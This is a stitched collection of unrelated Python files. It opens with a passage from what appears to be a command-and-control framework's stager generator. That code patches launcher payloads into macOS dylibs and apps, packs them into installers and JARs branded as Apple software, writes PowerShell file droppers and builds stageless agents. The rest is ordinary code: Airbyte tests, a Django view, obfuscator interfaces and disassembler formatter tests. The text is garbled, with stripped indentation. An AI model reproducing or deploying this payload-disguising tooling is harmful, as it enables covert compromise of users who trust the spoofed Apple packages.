Generates a dylib with an embedded python interpreter and runs launcher code when loaded into an application.
"""
import macholib.MachO
MH_DYLIB = 6
if hijacker.lower() == "true":
if arch == "x86":
f = open(
"%s/data/misc/hijackers/template.dylib"
% (self.mainMenu.installPath),
"rb",
)
else:
f = open(
"%s/data/misc/hijackers/template64.dylib"
% (self.mainMenu.installPath),
"rb",
)
else:
if arch == "x86":
f = open(
"%s/data/misc/templateLauncher.dylib" % (self.mainMenu.installPath),
"rb",
)
else:
f = open(
"%s/data/misc/templateLauncher64.dylib"
% (self.mainMenu.installPath),
"rb",
)
macho = macholib.MachO.MachO(f.name)
if int(macho.headers[0].header.filetype) != MH_DYLIB:
log.error("Dylib template is not the correct filetype")
return ""
        cmds = macho.headers[0].commands
        offset = placeHolderSz = 0  # set once the __cstring section is located
for cmd in cmds:
count = 0
if (
int(cmd[count].cmd) == macholib.MachO.LC_SEGMENT_64
or int(cmd[count].cmd) == macholib.MachO.LC_SEGMENT
):
count += 1
if (
cmd[count].segname.strip(b"\x00") == b"__TEXT"
and cmd[count].nsects > 0
):
count += 1
for section in cmd[count]:
if section.sectname.strip(b"\x00") == b"__cstring":
offset = int(section.offset)
placeHolderSz = int(section.size) - 52
template = f.read()
f.close()
if placeHolderSz and offset:
launcher = launcherCode + "\x00" * (placeHolderSz - len(launcherCode))
if isinstance(launcher, str):
launcher = launcher.encode("UTF-8")
patchedDylib = b"".join(
[template[:offset], launcher, template[(offset + len(launcher)) :]]
)
return patchedDylib
else:
log.error("Unable to patch dylib")
def generate_appbundle(self, launcherCode, Arch, icon, AppName, disarm):
"""
Generates an application. The embedded executable is a macho binary with the python interpreter.
"""
MH_EXECUTE = 2
if Arch == "x64":
f = open(
self.mainMenu.installPath
+ "/data/misc/apptemplateResources/x64/launcher.app/Contents/MacOS/launcher",
"rb",
)
directory = (
self.mainMenu.installPath
+ "/data/misc/apptemplateResources/x64/launcher.app/"
)
else:
f = open(
self.mainMenu.installPath
+ "/data/misc/apptemplateResources/x86/launcher.app/Contents/MacOS/launcher",
"rb",
)
directory = (
self.mainMenu.installPath
+ "/data/misc/apptemplateResources/x86/launcher.app/"
)
macho = macholib.MachO.MachO(f.name)
if int(macho.headers[0].header.filetype) != MH_EXECUTE:
log.error("Macho binary template is not the correct filetype")
return ""
        cmds = macho.headers[0].commands
        offset = placeHolderSz = 0  # set once the __cstring section is located
for cmd in cmds:
count = 0
if (
int(cmd[count].cmd) == macholib.MachO.LC_SEGMENT_64
or int(cmd[count].cmd) == macholib.MachO.LC_SEGMENT
):
count += 1
if (
cmd[count].segname.strip(b"\x00") == b"__TEXT"
and cmd[count].nsects > 0
):
count += 1
for section in cmd[count]:
if section.sectname.strip(b"\x00") == b"__cstring":
offset = int(section.offset)
placeHolderSz = int(section.size) - 52
template = f.read()
f.close()
if placeHolderSz and offset:
launcher = launcherCode.encode("utf-8") + b"\x00" * (
placeHolderSz - len(launcherCode)
)
patchedBinary = (
template[:offset] + launcher + template[(offset + len(launcher)) :]
)
if AppName == "":
AppName = "launcher"
tmpdir = "/tmp/application/%s.app/" % AppName
shutil.copytree(directory, tmpdir)
f = open(tmpdir + "Contents/MacOS/launcher", "wb")
if disarm is not True:
f.write(patchedBinary)
f.close()
else:
t = open(
self.mainMenu.installPath
+ "/data/misc/apptemplateResources/empty/macho",
"rb",
)
w = t.read()
f.write(w)
f.close()
t.close()
os.rename(
tmpdir + "Contents/MacOS/launcher",
tmpdir + "Contents/MacOS/%s" % AppName,
)
os.chmod(tmpdir + "Contents/MacOS/%s" % AppName, 0o755)
if icon != "":
iconfile = os.path.splitext(icon)[0].split("/")[-1]
shutil.copy2(icon, tmpdir + "Contents/Resources/" + iconfile + ".icns")
else:
iconfile = icon
appPlist = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>BuildMachineOSBuild</key>
<string>15G31</string>
<key>CFBundleDevelopmentRegion</key>
<string>en</string>
<key>CFBundleExecutable</key>
<string>%s</string>
<key>CFBundleIconFile</key>
<string>%s</string>
<key>CFBundleIdentifier</key>
<string>com.apple.%s</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundleName</key>
<string>%s</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleSignature</key>
<string>????</string>
<key>CFBundleSupportedPlatforms</key>
<array>
<string>MacOSX</string>
</array>
<key>CFBundleVersion</key>
<string>1</string>
<key>DTCompiler</key>
<string>com.apple.compilers.llvm.clang.1_0</string>
<key>DTPlatformBuild</key>
<string>7D1014</string>
<key>DTPlatformVersion</key>
<string>GM</string>
<key>DTSDKBuild</key>
<string>15E60</string>
<key>DTSDKName</key>
<string>macosx10.11</string>
<key>DTXcode</key>
<string>0731</string>
<key>DTXcodeBuild</key>
<string>7D1014</string>
<key>LSApplicationCategoryType</key>
<string>public.app-category.utilities</string>
<key>LSMinimumSystemVersion</key>
<string>10.11</string>
<key>LSUIElement</key>
<true/>
<key>NSHumanReadableCopyright</key>
<string>Copyright 2016 Apple. All rights reserved.</string>
<key>NSMainNibFile</key>
<string>MainMenu</string>
<key>NSPrincipalClass</key>
<string>NSApplication</string>
</dict>
</plist>
""" % (
AppName,
iconfile,
AppName,
AppName,
)
with open(tmpdir + "Contents/Info.plist", "w") as f:
f.write(appPlist)
shutil.make_archive("/tmp/launcher", "zip", "/tmp/application")
shutil.rmtree("/tmp/application")
with open("/tmp/launcher.zip", "rb") as f:
zipbundle = f.read()
os.remove("/tmp/launcher.zip")
return zipbundle
else:
log.error("Unable to patch application")
def generate_pkg(self, launcher, bundleZip, AppName):
# unzip application bundle zip. Copy everything for the installer pkg to a temporary location
os.chdir("/tmp/")
with open("app.zip", "wb") as f:
f.write(bundleZip)
zipf = zipfile.ZipFile("app.zip", "r")
zipf.extractall()
zipf.close()
os.remove("app.zip")
os.system("cp -r " + self.mainMenu.installPath + "/data/misc/pkgbuild/ /tmp/")
os.chdir("pkgbuild")
os.system("cp -r ../" + AppName + ".app root/Applications/")
os.system("chmod +x root/Applications/")
subprocess.call(
"( cd root && find . | cpio -o --format odc --owner 0:80 | gzip -c ) > expand/Payload",
shell=True,
stderr=subprocess.DEVNULL,
)
os.system("chmod +x expand/Payload")
with open("scripts/postinstall", "r+") as s:
script = s.read()
script = script.replace("LAUNCHER", launcher)
s.seek(0)
s.write(script)
subprocess.call(
"( cd scripts && find . | cpio -o --format odc --owner 0:80 | gzip -c ) > expand/Scripts",
shell=True,
stderr=subprocess.DEVNULL,
)
os.system("chmod +x expand/Scripts")
numFiles = subprocess.check_output("find root | wc -l", shell=True).strip(b"\n")
size = subprocess.check_output("du -b -s root", shell=True).split(b"\t")[0]
        size = int(size) // 1024  # du -b reports bytes; PackageInfo wants KiB
with open("expand/PackageInfo", "w+") as p:
pkginfo = """<?xml version="1.0" encoding="utf-8" standalone="no"?>
<pkg-info overwrite-permissions="true" relocatable="false" identifier="com.apple.APPNAME" postinstall-action="none" version="1.0" format-version="2" generator-version="InstallCmds-554 (15G31)" install-location="/" auth="root">
<payload numberOfFiles="KEY1" installKBytes="KEY2"/>
<bundle path="./APPNAME.app" id="com.apple.APPNAME" CFBundleShortVersionString="1.0" CFBundleVersion="1"/>
<bundle-version>
<bundle id="com.apple.APPNAME"/>
</bundle-version>
<upgrade-bundle>
<bundle id="com.apple.APPNAME"/>
</upgrade-bundle>
<update-bundle/>
<atomic-update-bundle/>
<strict-identifier>
<bundle id="com.apple.APPNAME"/>
</strict-identifier>
<relocate>
<bundle id="com.apple.APPNAME"/>
</relocate>
<scripts>
<postinstall file="./postinstall"/>
</scripts>
</pkg-info>
"""
pkginfo = pkginfo.replace("APPNAME", AppName)
pkginfo = pkginfo.replace("KEY1", numFiles.decode("UTF-8"))
pkginfo = pkginfo.replace("KEY2", str(size))
p.write(pkginfo)
os.system("mkbom -u 0 -g 80 root expand/Bom")
os.system("chmod +x expand/Bom")
os.system("chmod -R 755 expand/")
os.system('( cd expand && xar --compression none -cf "../launcher.pkg" * )')
with open("launcher.pkg", "rb") as f:
package = f.read()
os.chdir("/tmp/")
shutil.rmtree("pkgbuild")
shutil.rmtree(AppName + ".app")
return package
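    # PackageInfo bookkeeping above: numberOfFiles counts every entry under
    # root/ (find root | wc -l) and installKBytes is the payload size in KiB,
    # hence the division by 1024. Example: a 5,242,880-byte payload yields
    # installKBytes = 5120.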
def generate_jar(self, launcherCode):
with open(self.mainMenu.installPath + "/data/misc/Run.java", "r") as f:
javacode = f.read()
javacode = javacode.replace("LAUNCHER", launcherCode)
jarpath = self.mainMenu.installPath + "/data/misc/classes/com/installer/apple/"
try:
os.makedirs(jarpath)
except OSError as e:
if e.errno != errno.EEXIST:
raise
else:
pass
with open(jarpath + "Run.java", "w") as f:
f.write(javacode)
os.system(
"javac "
+ self.mainMenu.installPath
+ "/data/misc/classes/com/installer/apple/Run.java"
)
os.system(
"jar -cfe "
+ self.mainMenu.installPath
+ "/data/misc/Run.jar com.installer.apple.Run "
+ self.mainMenu.installPath
+ "/data/misc/classes/com/installer/apple/Run.class"
)
os.remove(
self.mainMenu.installPath
+ "/data/misc/classes/com/installer/apple/Run.class"
)
os.remove(
self.mainMenu.installPath
+ "/data/misc/classes/com/installer/apple/Run.java"
)
with open(self.mainMenu.installPath + "/data/misc/Run.jar", "rb") as jarfile:
jar = jarfile.read()
os.remove(self.mainMenu.installPath + "/data/misc/Run.jar")
return jar
def generate_upload(self, file, path):
script = """
$b64 = "BASE64_BLOB_GOES_HERE"
$filename = "FILE_UPLOAD_FULL_PATH_GOES_HERE"
[IO.FILE]::WriteAllBytes($filename, [Convert]::FromBase64String($b64))
"""
file_encoded = base64.b64encode(file).decode("UTF-8")
script = script.replace("BASE64_BLOB_GOES_HERE", file_encoded)
script = script.replace("FILE_UPLOAD_FULL_PATH_GOES_HERE", path)
return script
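    # Minimal usage sketch (hypothetical file and destination): the emitted
    # PowerShell decodes the blob client-side and writes it to disk.
    #     ps = stager_gen.generate_upload(b"hello", "C:\\Users\\Public\\hi.txt")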
def generate_stageless(self, options):
listener_name = options["Listener"]["Value"]
if options["Language"]["Value"] == "ironpython":
language = "python"
version = "ironpython"
else:
language = options["Language"]["Value"]
version = ""
active_listener = self.mainMenu.listenersv2.get_active_listener_by_name(
listener_name
)
chars = string.ascii_uppercase + string.digits
session_id = helpers.random_string(length=8, charset=chars)
staging_key = active_listener.options["StagingKey"]["Value"]
delay = active_listener.options["DefaultDelay"]["Value"]
jitter = active_listener.options["DefaultJitter"]["Value"]
profile = active_listener.options["DefaultProfile"]["Value"]
kill_date = active_listener.options["KillDate"]["Value"]
working_hours = active_listener.options["WorkingHours"]["Value"]
lost_limit = active_listener.options["DefaultLostLimit"]["Value"]
if "Host" in active_listener.options:
host = active_listener.options["Host"]["Value"]
else:
host = ""
with SessionLocal.begin() as db:
agent = self.mainMenu.agents.add_agent(
session_id,
"0.0.0.0",
delay,
jitter,
profile,
kill_date,
working_hours,
lost_limit,
listener=listener_name,
language=language,
db=db,
)
# update the agent with this new information
self.mainMenu.agents.update_agent_sysinfo_db(
db,
session_id,
listener=listener_name,
internal_ip="0.0.0.0",
username="blank\\blank",
hostname="blank",
os_details="blank",
high_integrity=0,
process_name="blank",
process_id=99999,
language_version=2,
language=language,
architecture="AMD64",
)
# get the agent's session key
session_key = agent.session_key
agent_code = active_listener.generate_agent(
active_listener.options, language=language, version=version
)
comms_code = active_listener.generate_comms(
active_listener.options, language=language
)
stager_code = active_listener.generate_stager(
active_listener.options, language=language, encrypt=False, encode=False
)
if options["Language"]["Value"] == "powershell":
launch_code = (
"\nInvoke-Empire -Servers @('%s') -StagingKey '%s' -SessionKey '%s' -SessionID '%s';"
% (host, staging_key, session_key, session_id)
)
full_agent = comms_code + "\n" + agent_code + "\n" + launch_code
return full_agent
elif options["Language"]["Value"] in ["python", "ironpython"]:
stager_code = stager_code.replace(
"b''.join(random.choice(string.ascii_uppercase + string.digits).encode('UTF-8') for _ in range(8))",
f"b'{session_id}'",
)
stager_code = stager_code.split("clientPub=DiffieHellman()")[0]
stager_code = stager_code + f"\nkey = b'{session_key}'"
launch_code = ""
if active_listener.info["Name"] == "HTTP[S] MALLEABLE":
full_agent = "\n".join(
[stager_code, agent_code, comms_code, launch_code]
)
else:
full_agent = "\n".join([stager_code, agent_code, launch_code])
return full_agent
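

# A self-contained sketch of the XOR-with-cycled-key + urlsafe-base64 round
# trip that generate_macho applies to the launcher string (standard library
# only; the key "subF" mirrors the hard-coded value above).
def _xor_b64_roundtrip_demo():
    import base64
    from itertools import cycle

    key = "subF"
    plaintext = "print('hi')"
    # Forward pass: XOR against the cycled key, then URL-safe base64.
    mixed = "".join(chr(ord(x) ^ ord(y)) for (x, y) in zip(plaintext, cycle(key)))
    blob = base64.urlsafe_b64encode(mixed.encode("utf-8"))
    # Reversing both steps recovers the original text exactly.
    recovered_mix = base64.urlsafe_b64decode(blob).decode("utf-8")
    recovered = "".join(
        chr(ord(x) ^ ord(y)) for (x, y) in zip(recovered_mix, cycle(key))
    )
    assert recovered == plaintext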


# ===========================================================================
# File: /dts/airbyte/airbyte-integrations/connectors/source-google-sheets/unit_tests/test_helpers.py
# Repo: alldatacenter/alldata (MIT / Apache-2.0 / BSD-3-Clause / Elastic-2.0)
# ===========================================================================
#
# Copyright (c) 2023 Airbyte, Inc., all rights reserved.
#
import unittest
from unittest.mock import Mock, patch
from airbyte_cdk.logger import AirbyteLogger
from airbyte_cdk.models.airbyte_protocol import (
AirbyteRecordMessage,
AirbyteStream,
ConfiguredAirbyteCatalog,
ConfiguredAirbyteStream,
DestinationSyncMode,
SyncMode,
)
from source_google_sheets.client import GoogleSheetsClient
from source_google_sheets.helpers import Helpers
from source_google_sheets.models import CellData, GridData, RowData, Sheet, SheetProperties, Spreadsheet
logger = AirbyteLogger()
def google_sheet_client(row_data, spreadsheet_id, client):
fake_response = Spreadsheet(
spreadsheetId=spreadsheet_id,
sheets=[Sheet(data=[GridData(rowData=row_data)])],
)
client.get.return_value.execute.return_value = fake_response
with patch.object(GoogleSheetsClient, "__init__", lambda s, credentials, scopes: None):
sheet_client = GoogleSheetsClient({"fake": "credentials"}, ["auth_scopes"])
sheet_client.client = client
return sheet_client
class TestHelpers(unittest.TestCase):
def test_headers_to_airbyte_stream(self):
sheet_name = "sheet1"
header_values = ["h1", "h2", "h3"]
expected_stream = AirbyteStream(
name=sheet_name,
json_schema={
"$schema": "http://json-schema.org/draft-07/schema#",
"type": "object",
# For simplicity, the type of every cell is a string
"properties": {header: {"type": "string"} for header in header_values},
},
supported_sync_modes=[SyncMode.full_refresh],
)
actual_stream = Helpers.headers_to_airbyte_stream(logger, sheet_name, header_values)
self.assertEqual(expected_stream, actual_stream)
    def test_duplicate_headers_retrieved(self):
header_values = ["h1", "h1", "h3"]
expected_valid_header_values = ["h3"]
expected_duplicate_header_values = ["h1"]
actual_header_values, actual_duplicate_header_values = Helpers.get_valid_headers_and_duplicates(header_values)
self.assertEqual(expected_duplicate_header_values, actual_duplicate_header_values)
self.assertEqual(expected_valid_header_values, actual_header_values)
def test_duplicate_headers_to_ab_stream_ignores_duplicates(self):
sheet_name = "sheet1"
header_values = ["h1", "h1", "h3"]
# h1 is ignored because it is duplicate
expected_stream_header_values = ["h3"]
expected_stream = AirbyteStream(
name=sheet_name,
json_schema={
"$schema": "http://json-schema.org/draft-07/schema#",
"type": "object",
# For simplicity, the type of every cell is a string
"properties": {header: {"type": "string"} for header in expected_stream_header_values},
},
supported_sync_modes=[SyncMode.full_refresh],
)
actual_stream = Helpers.headers_to_airbyte_stream(logger, sheet_name, header_values)
self.assertEqual(expected_stream, actual_stream)
def test_headers_to_airbyte_stream_blank_values_terminate_row(self):
sheet_name = "sheet1"
header_values = ["h1", "", "h3"]
expected_stream = AirbyteStream(
name=sheet_name,
json_schema={
"$schema": "http://json-schema.org/draft-07/schema#",
"type": "object",
# For simplicity, the type of every cell is a string
"properties": {"h1": {"type": "string"}},
},
supported_sync_modes=[SyncMode.full_refresh],
)
actual_stream = Helpers.headers_to_airbyte_stream(logger, sheet_name, header_values)
self.assertEqual(expected_stream, actual_stream)
def test_is_row_empty_with_empty_row(self):
values = [" ", "", " "]
self.assertTrue(Helpers.is_row_empty(values))
def test_is_row_empty_with_full_row(self):
values = [" ", "", " ", "somevaluehere"]
self.assertFalse(Helpers.is_row_empty(values))
def test_row_contains_relevant_data(self):
values = ["c1", "c2", "c3"]
relevant_indices = [2]
self.assertTrue(Helpers.row_contains_relevant_data(values, relevant_indices))
def test_row_contains_relevant_data_is_false(self):
values = ["", "", "c3"]
relevant_indices = [0, 1]
self.assertFalse(Helpers.row_contains_relevant_data(values, relevant_indices))
def test_parse_sheet_and_column_names_from_catalog(self):
sheet1 = "soccer_team"
sheet1_columns = frozenset(["arsenal", "chelsea", "manutd", "liverpool"])
sheet1_schema = {"properties": {c: {"type": "string"} for c in sheet1_columns}}
sheet2 = "basketball_teams"
sheet2_columns = frozenset(["gsw", "lakers"])
sheet2_schema = {"properties": {c: {"type": "string"} for c in sheet2_columns}}
catalog = ConfiguredAirbyteCatalog(
streams=[
ConfiguredAirbyteStream(
stream=AirbyteStream(name=sheet1, json_schema=sheet1_schema, supported_sync_modes=["full_refresh"]),
sync_mode=SyncMode.full_refresh,
destination_sync_mode=DestinationSyncMode.overwrite,
),
ConfiguredAirbyteStream(
stream=AirbyteStream(name=sheet2, json_schema=sheet2_schema, supported_sync_modes=["full_refresh"]),
sync_mode=SyncMode.full_refresh,
destination_sync_mode=DestinationSyncMode.overwrite,
),
]
)
actual = Helpers.parse_sheet_and_column_names_from_catalog(catalog)
expected = {sheet1: sheet1_columns, sheet2: sheet2_columns}
self.assertEqual(actual, expected)
def test_row_data_to_record_message(self):
sheet = "my_sheet"
cell_values = ["v1", "v2", "v3", "v4"]
column_index_to_name = {0: "c1", 3: "c4"}
actual = Helpers.row_data_to_record_message(sheet, cell_values, column_index_to_name)
expected = AirbyteRecordMessage(stream=sheet, data={"c1": "v1", "c4": "v4"}, emitted_at=1)
self.assertEqual(expected.stream, actual.stream)
self.assertEqual(expected.data, actual.data)
def test_get_formatted_row_values(self):
expected = [str(i) for i in range(10)]
row_data = RowData(values=[CellData(formattedValue=x) for x in expected])
actual = Helpers.get_formatted_row_values(row_data)
self.assertEqual(expected, actual)
def test_get_first_row(self):
spreadsheet_id = "123"
sheet = "s1"
expected_first_row = ["1", "2", "3", "4"]
row_data = [RowData(values=[CellData(formattedValue=v) for v in expected_first_row])]
client = Mock()
sheet_client = google_sheet_client(row_data, spreadsheet_id, client)
actual = Helpers.get_first_row(sheet_client, spreadsheet_id, sheet)
self.assertEqual(expected_first_row, actual)
client.get.assert_called_with(spreadsheetId=spreadsheet_id, includeGridData=True, ranges=f"{sheet}!1:1")
def test_get_first_row_empty_sheet(self):
spreadsheet_id = "123"
sheet = "s1"
row_data = []
client = Mock()
sheet_client = google_sheet_client(row_data, spreadsheet_id, client)
self.assertEqual(Helpers.get_first_row(sheet_client, spreadsheet_id, sheet), [])
client.get.assert_called_with(spreadsheetId=spreadsheet_id, includeGridData=True, ranges=f"{sheet}!1:1")
def test_get_sheets_in_spreadsheet(self):
spreadsheet_id = "id1"
expected_sheets = ["s1", "s2"]
client = Mock()
client.get.return_value.execute.return_value = Spreadsheet(
spreadsheetId=spreadsheet_id, sheets=[Sheet(properties=SheetProperties(title=t)) for t in expected_sheets]
)
with patch.object(GoogleSheetsClient, "__init__", lambda s, credentials, scopes: None):
sheet_client = GoogleSheetsClient({"fake": "credentials"}, ["auth_scopes"])
sheet_client.client = client
actual_sheets = Helpers.get_sheets_in_spreadsheet(sheet_client, spreadsheet_id)
self.assertEqual(expected_sheets, actual_sheets)
client.get.assert_called_with(spreadsheetId=spreadsheet_id, includeGridData=False)
    def test_get_available_sheets_to_column_index_to_name(self):
        spreadsheet_id = "123"
        sheet1 = "s1"
        sheet1_first_row = ["1", "2", "3", "4"]

        # Neither pytest nor unittest gives a clean way to vary a mock's
        # response by exact input arguments, so mock_client_call is wired in
        # via .side_effect and dispatches on (spreadsheetId, includeGridData,
        # ranges) itself.
def mock_client_call(spreadsheetId, includeGridData, ranges=None):
if spreadsheetId != spreadsheet_id:
return None
# the spreadsheet only contains sheet1
elif not includeGridData and ranges is None:
mocked_return = Spreadsheet(spreadsheetId=spreadsheet_id, sheets=[Sheet(properties=SheetProperties(title=sheet1))])
elif includeGridData and ranges == f"{sheet1}!1:1":
mocked_return = Spreadsheet(
spreadsheetId=spreadsheet_id,
sheets=[Sheet(data=[GridData(rowData=[RowData(values=[CellData(formattedValue=v) for v in sheet1_first_row])])])],
)
m = Mock()
m.execute.return_value = mocked_return
return m
client = Mock()
client.get.side_effect = mock_client_call
with patch.object(GoogleSheetsClient, "__init__", lambda s, credentials, scopes: None):
sheet_client = GoogleSheetsClient({"fake": "credentials"}, ["auth_scopes"])
sheet_client.client = client
actual = Helpers.get_available_sheets_to_column_index_to_name(
sheet_client, spreadsheet_id, {sheet1: frozenset(sheet1_first_row), "doesnotexist": frozenset(["1", "2"])}
)
expected = {sheet1: {0: "1", 1: "2", 2: "3", 3: "4"}}
self.assertEqual(expected, actual)
def test_get_spreadsheet_id(self):
test_url = "https://docs.google.com/spreadsheets/d/18vWlVH8BfjGegwY_GdV1B_cPP9re66xI8uJK25dtY9Q/edit#gid=1820065035"
result = Helpers.get_spreadsheet_id(test_url)
self.assertEqual("18vWlVH8BfjGegwY_GdV1B_cPP9re66xI8uJK25dtY9Q", result)
test_url = "https://docs.google.com/spreadsheets/d/18vWlVH8BfjGa-gwYGdV1BjcPP9re66xI8uJK25dtY9Q/edit"
result = Helpers.get_spreadsheet_id(test_url)
self.assertEqual("18vWlVH8BfjGa-gwYGdV1BjcPP9re66xI8uJK25dtY9Q", result)
test_url = "https://docs.google.com/spreadsheets/d/18vWlVH8BfjGegwY_GdV1BjcPP9re_6xI8uJ-25dtY9Q/"
result = Helpers.get_spreadsheet_id(test_url)
self.assertEqual("18vWlVH8BfjGegwY_GdV1BjcPP9re_6xI8uJ-25dtY9Q", result)
test_url = "https://docs.google.com/spreadsheets/d/18vWlVH8BfjGegwY_GdV1BjcPP9re_6xI8uJ-25dtY9Q/#"
result = Helpers.get_spreadsheet_id(test_url)
self.assertEqual("18vWlVH8BfjGegwY_GdV1BjcPP9re_6xI8uJ-25dtY9Q", result)
test_url = "18vWlVH8BfjGegwY_GdV1BjcPP9re66xI8uJK25dtY9Q"
result = Helpers.get_spreadsheet_id(test_url)
self.assertEqual("18vWlVH8BfjGegwY_GdV1BjcPP9re66xI8uJK25dtY9Q", result)
if __name__ == "__main__":
unittest.main()


# ===========================================================================
# File: /2020/06/24/How to Create a Celery Task Progress Bar in Django/djangoprogressbar/progress/example/views.py
# Repo: PrettyPrinted/youtube_video_code (Unlicense)
# ===========================================================================
from django.shortcuts import render
from .tasks import go_to_sleep
def index(request):
task = go_to_sleep.delay(1)
return render(request, 'example/index.html', {'task_id' : task.task_id})
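
# For context, a minimal sketch of what the imported task might look like
# (hypothetical; the real tasks.py is defined elsewhere in this project):
#     from celery import shared_task
#     import time
#
#     @shared_task(bind=True)
#     def go_to_sleep(self, duration):
#         for i in range(100):
#             time.sleep(duration / 100)
#             self.update_state(state="PROGRESS",
#                               meta={"current": i + 1, "total": 100})
#         return {"current": 100, "total": 100}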


# ===========================================================================
# File: /src/obfuscapk/obfuscator_category.py
# Repo: ClaudiuGeorgiu/Obfuscapk (MIT)
# ===========================================================================
#!/usr/bin/env python3
from abc import ABC, abstractmethod
from yapsy.IPlugin import IPlugin
from obfuscapk.obfuscation import Obfuscation
class IBaseObfuscator(ABC, IPlugin):
def __init__(self):
super().__init__()
self.is_adding_fields = False
self.is_adding_methods = False
@abstractmethod
def obfuscate(self, obfuscation_info: Obfuscation):
raise NotImplementedError()
class ITrivialObfuscator(IBaseObfuscator):
@abstractmethod
def obfuscate(self, obfuscation_info: Obfuscation):
raise NotImplementedError()
class IRenameObfuscator(IBaseObfuscator):
@abstractmethod
def obfuscate(self, obfuscation_info: Obfuscation):
raise NotImplementedError()
class IEncryptionObfuscator(IBaseObfuscator):
@abstractmethod
def obfuscate(self, obfuscation_info: Obfuscation):
raise NotImplementedError()
class ICodeObfuscator(IBaseObfuscator):
@abstractmethod
def obfuscate(self, obfuscation_info: Obfuscation):
raise NotImplementedError()
class IResourcesObfuscator(IBaseObfuscator):
@abstractmethod
def obfuscate(self, obfuscation_info: Obfuscation):
raise NotImplementedError()
class IOtherObfuscator(IBaseObfuscator):
@abstractmethod
def obfuscate(self, obfuscation_info: Obfuscation):
raise NotImplementedError()
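
# A minimal sketch of a concrete plugin built on these interfaces
# (illustrative only; real Obfuscapk plugins also ship yapsy plugin metadata
# next to the module, and the body below is deliberately elided):
#     class NopInserter(ICodeObfuscator):
#         def obfuscate(self, obfuscation_info: Obfuscation):
#             # walk the smali files referenced by obfuscation_info and
#             # rewrite them in place (details omitted)
#             ...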


# ===========================================================================
# File: /src/rust/iced-x86-py/tests/formatter_test.py
# Repo: icedland/iced (MIT)
# ===========================================================================
# SPDX-License-Identifier: MIT
# Copyright (C) 2018-present iced project and contributors
import pytest
from iced_x86 import *
FMT_SYNTAXES = [
FormatterSyntax.GAS,
FormatterSyntax.INTEL,
FormatterSyntax.MASM,
FormatterSyntax.NASM,
]
def test_invalid_syntax() -> None:
with pytest.raises(ValueError):
Formatter(0x12345) # type: ignore
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_op_access_arg(syntax: FormatterSyntax_) -> None:
instr = Decoder(64, b"\x62\xF2\x4F\xDD\x72\x50\x01").decode()
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.op_access(instr, 100)
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_get_instruction_operand_arg(syntax: FormatterSyntax_) -> None:
instr = Decoder(64, b"\x62\xF2\x4F\xDD\x72\x50\x01").decode()
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.get_instruction_operand(instr, 100)
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_get_formatter_operand_arg(syntax: FormatterSyntax_) -> None:
instr = Decoder(64, b"\x62\xF2\x4F\xDD\x72\x50\x01").decode()
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.get_formatter_operand(instr, 100)
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_format_operand_arg(syntax: FormatterSyntax_) -> None:
instr = Decoder(64, b"\x62\xF2\x4F\xDD\x72\x50\x01").decode()
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.format_operand(instr, 100)
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_number_base(syntax: FormatterSyntax_) -> None:
for base in range(0, 20):
formatter = Formatter(syntax)
if base == 2 or base == 8 or base == 10 or base == 16:
assert formatter.number_base == 16
formatter.number_base = base
assert formatter.number_base == base
else:
assert formatter.number_base == 16
with pytest.raises(ValueError):
formatter.number_base = base
assert formatter.number_base == 16
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_options_props(syntax: FormatterSyntax_) -> None:
formatter = Formatter(syntax)
formatter.uppercase_prefixes = True
formatter.uppercase_mnemonics = True
formatter.uppercase_registers = True
formatter.uppercase_keywords = True
formatter.uppercase_decorators = True
formatter.uppercase_all = True
formatter.first_operand_char_index = 10
formatter.tab_size = 4
formatter.space_after_operand_separator = True
formatter.space_after_memory_bracket = True
formatter.space_between_memory_add_operators = True
formatter.space_between_memory_mul_operators = True
formatter.scale_before_index = True
formatter.always_show_scale = True
formatter.always_show_segment_register = True
formatter.show_zero_displacements = True
formatter.hex_prefix = "0X"
formatter.hex_suffix = "H"
formatter.hex_digit_group_size = 5
formatter.decimal_prefix = "0D"
formatter.decimal_suffix = "D"
formatter.decimal_digit_group_size = 6
formatter.octal_prefix = "0O"
formatter.octal_suffix = "O"
formatter.octal_digit_group_size = 7
formatter.binary_prefix = "0B"
formatter.binary_suffix = "B"
formatter.binary_digit_group_size = 8
formatter.digit_separator = "`"
formatter.leading_zeros = True
formatter.uppercase_hex = False
formatter.small_hex_numbers_in_decimal = False
formatter.add_leading_zero_to_hex_numbers = False
formatter.number_base = 8
formatter.branch_leading_zeros = False
formatter.signed_immediate_operands = True
formatter.signed_memory_displacements = False
formatter.displacement_leading_zeros = True
formatter.memory_size_options = MemorySizeOptions.NEVER
formatter.rip_relative_addresses = True
formatter.show_branch_size = False
formatter.use_pseudo_ops = False
formatter.show_symbol_address = True
formatter.gas_naked_registers = True
formatter.gas_show_mnemonic_size_suffix = True
formatter.gas_space_after_memory_operand_comma = True
formatter.masm_add_ds_prefix32 = False
formatter.masm_symbol_displ_in_brackets = False
formatter.masm_displ_in_brackets = False
formatter.nasm_show_sign_extended_immediate_size = True
formatter.prefer_st0 = True
formatter.show_useless_prefixes = True
formatter.cc_b = CC_b.C
formatter.cc_ae = CC_ae.NB
formatter.cc_e = CC_e.Z
formatter.cc_ne = CC_ne.NZ
formatter.cc_be = CC_be.NA
formatter.cc_a = CC_a.NBE
formatter.cc_p = CC_p.PE
formatter.cc_np = CC_np.PO
formatter.cc_l = CC_l.NGE
formatter.cc_ge = CC_ge.NL
formatter.cc_le = CC_le.NG
formatter.cc_g = CC_g.NLE
assert formatter.uppercase_prefixes
assert formatter.uppercase_mnemonics
assert formatter.uppercase_registers
assert formatter.uppercase_keywords
assert formatter.uppercase_decorators
assert formatter.uppercase_all
assert formatter.first_operand_char_index == 10
assert formatter.tab_size == 4
